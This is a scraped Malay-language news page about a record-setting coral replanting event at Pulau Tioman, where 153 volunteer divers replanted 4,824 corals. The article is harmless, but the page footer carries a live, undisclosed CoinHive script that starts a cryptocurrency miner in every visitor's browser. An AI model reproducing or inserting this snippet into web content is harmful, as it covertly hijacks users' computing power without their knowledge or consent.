© Copyright 2017, All Rights Reserved
Home / Ekslusif / Acara terbesar tanam semula terumbu karang cipta rekod baru

Acara terbesar tanam semula terumbu karang cipta rekod baru

PULAU TIOMAN: Seramai 153 penyelam berjaya memecah rekod untuk acara terbesar penanaman semula terumbu karang di Malaysia dalam Malaysia Book of Records.

Misi yang bermula sejak 7 pagi itu menyaksikan sejumlah 4,824 terumbu yang berjaya ditanam semula di perairan Pulau Tioman.

Perkara itu diumumkan Timbalan Pengurus Besar Malaysia Book of Records, Mohamad Alex Edward, kira-kira jam 2 petang tadi.

Ujarnya, pada 2014, pihak Lembaga Hasil Dalam Negeri (LHDN) telah mencipta rekod menanam 3,040 terumbu karang di Pulau Manukan, Sabah.

“Namun kali ini rekod itu telah berjaya dipecah Leges Divers yang mencapai 58% lebih banyak daripada rekod yang dicipta sebelumnya,” katanya.

Usaha penanaman terumbu karang itu merupakan sebahagian daripada program pantai dan dasar laut anjuran Leges Divers yang telah berlangsung sejak Februari lalu. Astro AWANI / TAN SU LIN

Anjuran Leges Divers, peserta pada kali ini terdiri daripada penyelam sukarelawan dari seluruh negara dan turut disertai wakil Jabatan Laut Malaysia dan Jabatan Taman Laut Pahang.

Sementara itu, Pengarah Program Rysha Mustaffa menyifatkan kejayaan kali ini sebagai hasil kerjasama semua pihak.

“Bukan hanya kita berjaya mencipta rekod baharu tetapi kita juga berjaya menanam semula lebih 4,000 terumbu karang yang melibatkan persiapan rapi sejak 3 bulan lalu. Ia hasil usaha keras semua orang,” katanya.

Tambah Rysha, usaha penanaman terumbu karang itu merupakan sebahagian daripada program pantai dan dasar laut anjuran pertubuhan bukan kerajaan (NGO) itu yang telah dijalankan sejak Februari lalu.

“Kami berhasrat dapat meneruskan program penanaman semula terumbu karang ini untuk tempoh lima tahun dan kami menyasarkan 30,000 terumbu karang dapat ditanam semula dalam tempoh berkenaan,” katanya.

Terumbu karang yang dipilih diikat pada rangka diperbuat daripada PVC dan diletakkan pada dasar laut pada jarak kira-kira 70 meter dari pantai bagi menggalakkan pertumbuhan terumbu karang baharu.

Pertumbuhan terumbu karang baharu dijangka boleh mencecah sehingga 15 cm dalam tempoh setahun.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Bawa anak tengok game untuk hilang stres

KOTA KINABALU: Ketika tingkat 4 pusat membeli-belah Centre Point di sini dipenuhi ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();